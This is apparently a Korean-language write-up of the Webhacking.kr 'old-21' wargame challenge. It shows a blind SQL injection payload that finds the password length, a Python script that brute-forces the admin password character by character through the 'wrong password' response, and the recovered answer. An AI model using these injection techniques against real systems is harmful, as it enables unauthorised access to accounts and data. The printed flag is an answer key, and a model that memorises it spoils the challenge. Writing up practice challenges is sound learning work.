Webhacking.kr - old-21

문제는 다음과 같다.

Result 값으로는 login success, login fail, wrong password가 나온다.

wrong password를 통해 문제를 풀면 될 것 같다.

 

length는 ?id=admin&pw=%27%20or%20length(pw)=36%23 을 통해 36자리라는 것을 알았다.

이 후에는 코드를 통해 비밀번호를 찾았다.

import requests

answer = ''

for i in range(1,37):
	for j in range(33,128):
		url = "https://webhacking.kr/challenge/bonus-1/?id=admin&pw=' or ascii(substr(pw,{},1))={}%23".format(i,j)
		cookies = {'PHPSESSID':'자신의 PHPSESSID'}
		response = requests.get(url=url,cookies=cookies)
		if response.text.find("wrong password") != -1:
			answer += chr(j)
			print 'Found {}st letter'.format(i)
			break
		print '{}st letter {}th '.format(i,j)

print answer    

 

비밀번호 값으로 ghere_is_no_rest_for_the_white_angel 가 나오지만, ghere에서의 g 는 t보다 g가 더 앞에 있어서 섞여 나온것 같아 t로 변경해서

 

there_is_no_rest_for_the_white_angel 로 로그인해보았다.

 

 

solve